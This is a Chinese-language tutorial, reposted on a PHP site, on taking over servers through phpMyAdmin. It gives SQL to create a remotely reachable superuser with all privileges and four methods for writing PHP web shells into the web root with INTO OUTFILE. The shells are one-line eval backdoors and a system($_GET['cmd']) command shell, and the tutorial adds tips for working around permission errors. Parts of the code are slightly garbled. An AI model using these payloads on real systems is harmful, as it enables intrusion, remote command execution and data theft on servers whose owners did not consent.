首頁  >  文章  >  資料庫  >  總結PHPmyadmin拿shell

總結PHPmyadmin拿shell

藏色散人
藏色散人轉載
2021-01-04 14:37:481951瀏覽

下面由phpmyadmin使用教學欄位來總結#phpmyadmin拿shell,希望對需要的朋友有幫助!

總結PHPmyadmin拿shell

PHPmyadmin拿shell總結

PHPmyadmin修改使用者密碼

#直接點選上面的localhost或1270.0.1,出現用戶一欄,點選修改即可

 

新增超級使用者guetsec密碼ooxx並且允許外連

GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;

我們可以建立root帳號設定密碼

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;

這樣就建立了root外聯帳戶,密碼123456,外鏈時用123456

拿shell四種經典方法:

方法一:

CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES (&#39;<?php @eval_r($_POST[7on])?>&#39;);
SELECT 7onFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
    一句话连接密码:7on

   

方法二:

读取文件内容:    select load_file(&#39;E:/xamp/www/s.php&#39;);
写一句话:    select &#39;<?php @eval_r($_POST[cmd])?>&#39;INTO OUTFILE &#39;E:/xamp/www/study.php&#39;
cmd执行权限:    select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;
\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'

   

   

#方法三:

#JhackJ版本PHPmyadmin拿shell

Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES(&#39;<?php eval_r($_POST[cmd])?>&#39;);
select cmd from study into outfile &#39;E:/wamp/www/7.php&#39;;
   
Drop TABLE IF EXISTS study;
   
<?php eval_r($_POST[cmd])?>
--------------------------------------------------------------------------------
<?php @eval_r($_POST[cmd])?>
   
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
INSERT INTO study( cmd ) VALUES (&#39;<?php eval_r($_POST[cmd])?>&#39;);# 影响列数: 1
SELECT cmdFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;# 影响列数: 1
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。

   

方法四:

select load_file(&#39;E:/xamp/www/study.php&#39;);
select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;
\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'

然後造訪網站目錄:http://www.2cto.com/study.php?cmd=dir

 

Phpmyadmin匯出一句話時出現(Errcode: 13 - Permission denied)

是對此目錄沒有權限,可以試試上級目錄,或是下級目錄

 

再不行試試NTS引流

還有就是要注意目錄\

以上是總結PHPmyadmin拿shell的詳細內容。更多資訊請關注PHP中文網其他相關文章!

陳述:
本文轉載於:cnblogs.com。如有侵權,請聯絡admin@php.cn刪除